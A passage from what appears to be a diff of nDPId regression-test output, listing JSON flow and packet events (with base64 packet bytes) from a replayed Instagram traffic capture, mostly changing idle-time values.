pVFaKK+f+Osc32N80bLx0naY6\/StT9w4Neeouf2Tn\/vkhhHb5a5vAV9Sx5efQ\/Fatqq174n5ea7v9ir3vf4yK3Pnlx3v3fywdfv\/ld3jdWI6CQY9xByO962aeABxBaD0Ff8vq65YOluUkGW\/xG5p7nyyq1NumgVeaWXPx2O3qpBCTyam4Mj9KNa9CLu77T788mzfZZLswHVfevJGWxpG6er55a4je67Jde+KzsbHfq771q7M2+z\/WWJw+2E3Gv8+Ffd+tBC77nzd2bXmu\/clj6qf9o8rFbG7XiKrvvv6XxVyXfvsflY+OxHlh7gk3Z3+CHdjx7fieVi8bxm781fQKvN8eNlagx6Pt3\/NOSAfXLBsZ085Sli5c\/HVLg4fEITYcZuYfT1VtMLoUR\/it2aocyhvwSZMTvD5t065r2N7JUsZycS8vq283r4S3bSl8\/xBhG2Ci5YyWnWnN8pxV7z+JfURJd7rip6XefL+Ju6T2Uxe8n5uUueW8j7FWxyhWWeGt2YWoIb6BgT6P7uCHnx\/HwXcNPzZiXBYPY6liIwioP5BO9O7zdXvrl6Ju71WJu93dF9e+W764JLl\/1aJkh+a8yX4S4lMe7dI+73eX7WiDQUaZve75ZfLkLUJX2tpOX0s4hxEi8nbq2h\/\/mvflq9RBfYRrfTdMUcVv5e78i9rwQyT\/Sl\/1zQY9T8g\/Uty51S6PL8o6JLB8VrQkT8ugJnmu83Eyez2e5Qy1+W7Aw4JHINbEb3Lj395YP7YvjhcMBXfvXJ44Z+Ixmnuj5fXvqryZ8aIvNfJRrTESolEZ4VaoKtE96vFFfwld9u321frxC3vvk10K23e7KuXiuSPeX78kEfFYr7eXpJxFpezOY6TshceqnnmzDJNaHyWEjeK+xtg7siFQxNUarW6raVTT\/fwlt3m1+qIhVuJsRCxFdbFXtQf9\/RdIuTCv1R7IUVly5mtgVW\/5h5d378ta7e\/5QkWm71LXLL\/Y\/yuCATBPFbu75ZM1tF4Xr2urFPeZ1jp6PYqu0ysRtkUSKOnvSvJ9F0HEq\/Rr4RDbTxd+7uU\/Q0X5NSa4riJq7\/YqaIUW4dNr2MWX30vRqr09mqvna6y\/VdiohYPHuWzpM\/5V791hHspd591pkzSvTJiOetcEmlGTx05fm5r+E5WPIYg3+Ld5OiDJCb38Xd9ysF92RKCKwntddXfaT3LP\/4K7yaDr4HbV6D7vh8Ru7u\/ShH0gWZxKK93e\/u7nhshKX\/8u99ZHz6WcFOZh7FbiudjfLamk58fUJd3H2j6sTr\/E4xQhYhPxokXSHH53b6EIn4I8kGvoiAAQAAAAAAACAYAavAAAAAgECXIEAAAAAAAAAAAAAAAACAAWcAAAAZwAAAAUAAQABAAAAAIBgBrAAAAACAQJcAQAAAAAAAAAAAAAAAAIABZwAAABnAAAFoQABAAEAAAAAgGAGsQAAAAIBAlwBAAAAAAAAAAAAAAAAAgAFnAAAAGcAAAs9AAEAAQAAAACA4AayAAAAAgECXEEAAAAAAAAAAAAAAAACAAFNAAAAZwAAENkAAQABARggBwEYIAcAABVgQZrjwgqFiDcfxdYWFjNTGhc\/+kWorCzCP06aQacK5fU3p2bDv4QjGkzRtJEnNbVPk\/10ykQi0ZJ4s6VFQ2Ko59C0bD2u1KUtTyS\/\/DlRe1HhoMlOd6CAkkRYQkwPPOx2Ho6SCe9GzaPNROS+"} +00673{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":572,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720950909,"flow_last_seen":1436720950923,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":29358,"flow_avg_l4_payload_len":917,"midstream":1,"thread_ts_msec":1436720950923,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {}} +00674{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":572,"source":"instagram.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720950909,"flow_last_seen":1436720950923,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1398,"flow_tot_l4_payload_len":29358,"flow_avg_l4_payload_len":917,"midstream":1,"thread_ts_msec":1436720950923,"l3_proto":"ip4","src_ip":"31.13.86.52","dst_ip":"192.168.0.103","src_port":80,"dst_port":58216,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"HTTP.Facebook","breed":"Fun","category":"SocialNetwork"},"http": {}} +00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":645,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952553,"flow_last_seen":1436720952553,"flow_idle_time":7560000,"flow_min_l4_payload_len":1418,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1418,"flow_avg_l4_payload_len":1418,"midstream":1,"thread_ts_msec":1436720952553,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +02382{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":645,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1436720952553,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720952553,"pkt":"QPMIw47hABsv8H60CABFAAW+RXVAADMGTWwCFuwzwKgAZwBQrHcqB5rC6nVWeIAQAeYA6gAAAQEICmBlKDgAA\/+vNN9ULewTHBOFuxeelHDOvSnlSV1MyHTuCPSU99J+Rb8TuXzL6L8kVMT9JeX\/AEeHJMKvc8yfZQDY5nhAsWaIx3cLbY2ubZRDNurbaUASgAZ45AKigq45hruCoLni5pLmg59eiPd\/MiN87txVNMyFgkWsWfkcvPvLq3ncGqOJteWDTNpm8JnDNe\/V0S2KHy+GaSkVk8YYmWOQdL4xuwexnBqduXqVc8IuuI9MY+Zt8cnTPcsfLLIlpNfPzE+aRdsInsLztgb98N0mNzOHWHNTZrWKQPr9F5EE8pK7KRl773oe+7TTr1byuTp17xSTo5toqt17OaKtyATyBsMufY15yTPDfHSZYsAADIDSioIAAAHiqKF1TXzn1tX21U6idxttVoiynCqd8u3uesClb\/XTWQXOtPYUXP50lMJRzX9QM7C64zEeROD4ZaaRjli0mWIjfY1adjPenj65KGzqNXJTVghI+6I9UuSYsusH3FlxFno1c9JW3qbWRHfo32lBRAAGeChkqKC5IoYXnRl6Z3L5dCnLn26mSNOSOlqcea5o+UReR652+3d2\/Dab0zb9PXGqPSSLVDbNYRN6MtmpYbJEJLFdJ2RaURdiZY5h0OrU5h7IeY888nVsXnwm4oxv7JWfA68vLc8ehxYrmuOvDGouaBzaCTVP8+zXrnlnrxCWO9ezKKfpVjom7FpO6KTzNl60JdWhqz19c1yubV3UpRimqVV2W9Iuz4HPYBS04ZbGvOuvLXvjiZYsyxAFADSAAAIAHiqKCLcMvDzel9taKZLs5gp0t2Sh58L9ypUAXrhU0aeiss785JfFQgziXCyntnoKqRxzXlrlhljpCKihlu1P7THj6681RUYywmYQzKyhFbllawrlLFUK21TYahBMm4bB0c\/Q0qorQAApkAqZAqooYd7fNpcf2zJkmmfqN4IOKohvY2dlqWGThFbWF\/iVS78WnnJ2uDHuZI98fVGcac2Zm9mcm1UZY5ht7uDaF69Ec7stO3DjzT4G5waWu1vkbTUs3N04NR5d+uk9NE0xVVXqfWMDHPBz3TyJ2pj1SeiHvpcNbNaNfVk2d++zGVKltAVHjbncFMYehMEedktrQOr+f0lWrmtUm+5kDyFpIAAACABpAAAEADxUAvSVxiQ0ufh6dafDwdvPJvem8y03645umpEvJ0dXO8bOVZrlo6+6HRHb0ou72TKnrj5KPN7\/AOgKGio1hlhcLnqyF3+tvLXsSbkfin2t4tioTO4NYFQ\/cjnql8XXv1hza9+0Ud7jZRwM7yzJxDp5um5UBpRFBRFDJUAyXHIMLhp62c7n0OsJjy0iGfHrFKd3PzhU8hjD\/pFzODc\/Y6udSW9S1xmy97TUsc6rydtdS82Etsi8jjdrKKSuKgmeOTOnu4nJHsh6YHzk6+ZUwTisdkMdqJMzvOrXOshOkK636OrSLZYJJHZcArm2apudeK4tWc27cstemRx+TikdR37SEPju+kLssw2Gc1wOvJ2hIdaYk1zq07Iu2KUuuldIaeHl165wzJM2tQDAAEFA0ACABgAIKiLtm1f2FaZdGxIrg19HJLzj8n4Ypnc+B3T5H9i6KUpcY+86xxUVeVESMl8UPe1Kc82\/VTk3j\/1J5ak58ckqUUUN\/rfyR6eHcXir2n4sx0h9l1nO6iWmGyLxxNiNJu0g3Ybk0hqbHRqCIdPN0XOQitAAKqALljkCrjkGF2Uncud2zD5hCufWAuzR3tSLQmaqnX6OSXbK53hgkuOsgpG7qQpZRqSR+oidlVpZdTrxXdIxxKXxG1ojMpizEzxzZ0OrW7I9gvrG+cnXo1beEccjsojNZyrk6C5qrW4NVKD9vH1VFwxWVxccbqS2Yg5iCSbQN4k01rSK6ZNFZW1N6VuWn84="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1436720952553,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720952553,"pkt":"ABsv8H60QPMIw47hCABFAAA0quZAAEAG4ITAqABnAhbsM6x3AFDqdVZ4KgegTIAQAtavfwAAAQEICgAD\/7RgZSg4"} +02387{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1436720952555,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1484,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1484,"pkt_l4_len":1450,"thread_ts_msec":1436720952555,"pkt":"QPMIw47hABsv8H60CABFAAW+RXZAADMGTWsCFuwzwKgAZwBQrHcqB6BM6nVWeIAQAeZ8mQAAAQEICmBlKDgAA\/+vtV20fc9mrp1dM1zdmjppSPVtJK34O3VnVq0beVF65xNDXtnFMscw0gMAAAA0IoJBUBRFARUHcs5g82pbGbtawVs6OSKR1bUyvV0dTgqje3NxuXVMt1wlAegfPgme8KPvNkyz2Nzpho206rca8VQBcVDdd9H2q16p8Xe1\/FGG0PnMFm95yjbzbc7y6uXqTNGzWHDjlr1zbmh3aAiPRz9FJQBKIrBUUFyxyAyxUMbqpW7M7s+HSqN8+tay6O9jTtj28wUzIo\/I9c7sc2SRY7SGir2ou5wYpBHamL2VXdh1GOfOiG2KSWK0ZRWURgMc8c2dLwzO6PYryxPPJ14tXbyVLEzu7AiS6csbmt9Otxqax6NG+4uWLSiIMYORwY5GrXsyVyji63ZEef2CRuZlT9tVLFa7rpa4rN2GvKa6elt72n7oBKscxMtLQoy7qN1yh+eGrfONLhtDQAwAAEA0gCRQARQaoCLnm9fzqjnZ3VrTw09XILe19+jPTt59nHFRbU0OOuNydnD0UHny+qEQy39QN7UThl7edlc1nfdBowRUELhmGc+r+yWewvFPtPxXnpDZ1BZmRK8zLPQ38W8W\/X1YhH8M9eufC2d\/AOI79G+kqiNKqKAqKC5YqC5IoY3XSd0Z3Y8akkew1rnv4HkTku3FOmJHHJJtncsjjclx1kPn70JQGkcLY6tNQ0zKJTVjWvXtSZIzLIrSwjEmjQ8c8c2dDq1OqPYLu39fJ1betucGQOPuDRUSXa1cLIpt3N2mddd7Y5VNmsbw2Da2\/vbQiUjZHiNOuRQ2ZSRqRNXXUTanbbp9PbdNN2jY6tLkwRT\/ANjbmOa9UE6Uotjv45c4hUhaamqOkXoyhy4okgDYACCgaABAAIoAADuWUw2fta4zKI7NJxuGVLi29HLne+NvcdlxB1aHHXK2+xtdVSUBfVAg1XrRV5tTjh624ct8i+wPNScORUqMc8Mwy9A0D69VT7xd7V8U53E5jD5vecyw6sYrVuz2BjjtWSJ8nbzbRwtr0xDjG\/RvaURWshFABQXLDMBUUMbnpi4stLLjsnZ8NankEdmWkdab9Muk5DH3nTO4pEwOWG8yo2aQrXLjZXdiuNM0hcyDVu59yGWKyiLXOcZkMeVY7MM2dDs0OqPZPZydXJ159bc5NQmJyqJ1n3Y9HE20x57YdM68dmx\/qZ\/xubZFscff4rR1u4z59Nv1lM66iJZ3x2S6YP1M3XSpWVsVDbdy6xp4Yopxy1ire9NXUDdH5QwofuPrbhV5y8si6MKyVFHiAwABRANQgJRFAEAFRQtucQmaM4mXub5p95Oznuefj688r5I9Io3NRJy4pPrlN+ht2Ku6h\/QXn5ptuulbZCyuVgkTcvo6\/Kxzrz2meGueGWOSOn3F4n9xzTh4w9X+ac6rWdQ67Ljk1S7rhwtJ3i1X+cw4WoLju5KMI5Io4ONbtW2kog1kACqiguWGYCooYz6ATTO7t5HXhw1qebQF2qZdp0cidTv0Xe9srme4048++yBSFg0z42SRtNxxS2IytrHPX1Ij8Vk7Fa5o\/JWGa5s9+xmDrx9qPYDw1O\/L1a89e2KisZlDBefSxSPipRRjkzbpFVvfK43E7weGqLi0clcfofITO4hnvIobM4rryyF2jrvNWRSt60dFarYqu52R3e5aM9G\/a4brng6ZBkiCt702S5fDbSrWoq\/NToyhaKjMRAFBAUANYAkUAEUBFQHbM3h00ta4zJY\/J3bGvNV08O1ZZGZNGYqLS2JzrXKQObG9Rfd54v2gqlsvGjrpY\/dvL3jmUMnMFz0834bMNsda54g8+w\/HfreHt8+XvQ8OvrspC67h\/dIPKIblw4peerNFqYI1OTSaIwPLKqjmzXmxQGlXFQVcVBVxyBVxUM4="} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":663,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952561,"flow_last_seen":1436720952561,"flow_idle_time":7560000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":1,"thread_ts_msec":1436720952561,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"46.33.70.159","src_port":58690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":663,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1436720952561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1436720952561,"pkt":"ABsv8H60QPMIw47hCABFAABZAuBAAEAGAfDAqABnLiFGn+VCAbsSlgM32Tfr4YAYA4n5fAAAAQEICgAD\/7VWGIoUFQMBACAs4KplPbzXnvu9o5LJf4SK8seDxrub6gsxIshtI3HaOA=="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"instagram.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1436720952561,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720952561,"pkt":"ABsv8H60QPMIw47hCABFAAA0AuFAAEAGAhTAqABnLiFGn+VCAbsSlgNc2Tfr4YARA4k19gAAAQEICgAD\/7VWGIoU"} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":669,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952563,"flow_last_seen":1436720952563,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1436720952563,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":27124,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":669,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1436720952563,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":85,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":85,"pkt_l4_len":51,"thread_ts_msec":1436720952563,"pkt":"ABsv8H60QPMIw47hCABFAABH\/7VAAEARadHAqABnCAgICGn0ADUAM87BrqQBAAABAAAAAAAACHBob3Rvcy1iAmFrCWluc3RhZ3JhbQNjb20AAAEAAQ=="} 00785{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":669,"source":"instagram.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952563,"flow_last_seen":1436720952563,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":43,"flow_tot_l4_payload_len":43,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1436720952563,"l3_proto":"ip4","src_ip":"192.168.0.103","dst_ip":"8.8.8.8","src_port":27124,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Instagram","breed":"Fun","category":"SocialNetwork"},"dns": {"query":"photos-b.ak.instagram.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":694,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720952553,"flow_last_seen":1436720952574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24106,"flow_avg_l4_payload_len":753,"midstream":1,"thread_ts_msec":1436720952574,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720952553,"flow_last_seen":1436720952574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24106,"flow_avg_l4_payload_len":753,"midstream":1,"thread_ts_msec":1436720952574,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720952611,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1436720952611,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720952611,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGC\/YuIUaWwKgAZwBQn5dVkK9h7WtuhaASOJDXwwAAAgQFlgQCCAoJIvhRAAP\/swEDAwU="} -00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1436720952611,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720952611,"pkt":"ABsv8H60QPMIw47hCABFAAA0kThAAEAGc8XAqABnLiFGlp+XAFDta26FVZCvYoAQAOU17QAAAQEICgAD\/7oJIvhR"} +00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":694,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720952553,"flow_last_seen":1436720952574,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24106,"flow_avg_l4_payload_len":753,"midstream":1,"thread_ts_msec":1436720952574,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":694,"source":"instagram.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1436720952553,"flow_last_seen":1436720952574,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":24106,"flow_avg_l4_payload_len":753,"midstream":1,"thread_ts_msec":1436720952574,"l3_proto":"ip4","src_ip":"2.22.236.51","dst_ip":"192.168.0.103","src_port":80,"dst_port":44151,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":737,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1436720952611,"flow_last_seen":1436720952611,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1436720952611,"l3_proto":"ip4","src_ip":"46.33.70.150","dst_ip":"192.168.0.103","src_port":80,"dst_port":40855,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":737,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1436720952611,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1436720952611,"pkt":"QPMIw47hABsv8H60CABFAAA8AABAADkGC\/YuIUaWwKgAZwBQn5dVkK9h7WtuhaASOJDXwwAAAgQFlgQCCAoJIvhRAAP\/swEDAwU="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":738,"source":"instagram.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1436720952611,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1436720952611,"pkt":"ABsv8H60QPMIw47hCABFAAA0kThAAEAGc8XAqABnLiFGlp+XAFDta26FVZCvYoAQAOU17QAAAQEICgAD\/7oJIvhR"} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","packets-captured":745,"packets-processed":743,"total-skipped-flows":0,"total-l4-data-len":515476,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":23,"total-detection-updates":15,"total-updates":0,"current-active-flows":32,"total-active-flows":32,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":158,"global_ts_msec":1568796253770} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1568796253770,"flow_last_seen":1568796253770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1568796253770,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1568796253770,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1568796253770,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAr7AqAIRHw1WNMDLAbuZigajAAAAALAC\/\/8cPAAAAgQFtAEDAwYBAQgKDXByoQAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":746,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1568796253782,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1568796253782,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAFQGLsIfDVY0wKgCEQG7wMv1rwrBmYoGpKASbHB3qgAAAgQFeAQCCAo6Lg6wDXByoQEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1568796253784,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1568796253784,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAsrAqAIRHw1WNMDLAbuZigak9a8KwoAQCAwKkgAAAQEICg1wcq86Lg6w"} -00918{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":748,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1568796253770,"flow_last_seen":1568796253784,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1568796253784,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"7a29c223fb122ec64d10f0a159e07996","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} -00967{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":750,"source":"instagram.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1568796253770,"flow_last_seen":1568796253798,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1610,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1568796253798,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"31.13.86.52","src_port":49355,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Instagram","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.3 (Fizz)","client_requested_server_name":"scontent-mxp1-1.cdninstagram.com","ja3":"7a29c223fb122ec64d10f0a159e07996","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.3 (Fizz)"}} 